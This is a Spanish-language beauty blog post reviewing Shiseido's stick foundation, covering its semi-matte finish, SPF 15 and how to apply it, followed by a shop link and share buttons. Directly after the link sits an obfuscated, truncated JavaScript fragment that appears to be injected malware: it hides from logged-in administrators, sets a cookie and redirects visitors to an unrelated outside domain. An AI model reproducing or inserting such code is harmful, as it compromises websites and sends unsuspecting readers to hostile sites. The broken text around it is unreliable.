Hoy os voy a hablar de este fondo de maquillaje en Stick de Shiseido. Tiene un acabado semi-mate, es de larga duración y su cobertura es modulable dependiendo de la cantidad de producto que apliques sobre la piel.

Tiene un efecto alisador, ya que desde el momento de su aplicación minimiza la apariencia de los poros y las líneas de expresión, cubriéndolos de manera óptica a la vez que hidrata la piel. Contiene un SPF 15, que protege la piel contra los efectos nocivos de los rayos UVA/UVB.

Debe aplicarse después del tratamiento habitual, extendiendo directamente el stick sobre la piel desde el centro del rostro hacia los extremos, aplicando un poco más, allá donde se necesite cobertura. Y para que el acabado sea perfecto, lo ideal es utilizar los dedos para extender el producto sobre la piel.

Es un maquillaje distinto a lo habitual, pero es tan cómodo y fácil de utilizar que te encantará… 😉

Este producto está disponible online http://www.perfumestintin.com/fondos-compactos/10190031-shiseido-stick-foundation-spf15.html?id_category=99100545558 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone